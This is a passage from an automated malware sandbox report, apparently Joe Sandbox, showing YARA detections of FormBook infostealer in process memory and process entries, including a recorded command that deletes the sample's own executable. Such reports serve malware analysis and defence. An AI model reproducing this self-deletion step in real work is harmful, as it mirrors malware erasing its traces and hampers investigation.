                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.497388587.0000000000A40000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.497388587.0000000000A40000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.497388587.0000000000A40000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.500475231.0000000000E90000.00000004.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.500475231.0000000000E90000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.500475231.0000000000E90000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.499943855.0000000000E60000.00000040.00000001.sdmp, Author: Joe Security
                                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.499943855.0000000000E60000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                    • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.499943855.0000000000E60000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                    Reputation:moderate

                                                                    General

                                                                    Start time:18:25:33
                                                                    Start date:03/08/2021
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:/c del 'C:\Users\user\Desktop\V5cfxBHd71.exe'
                                                                    Imagebase:0x150000
                                                                    File size:232960 bytes
                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    General

                                                                    Start time:18:25:34
                                                                    Start date:03/08/2021
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff7ecfc0000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Disassembly

                                                                    Code Analysis

                                                                    Reset < >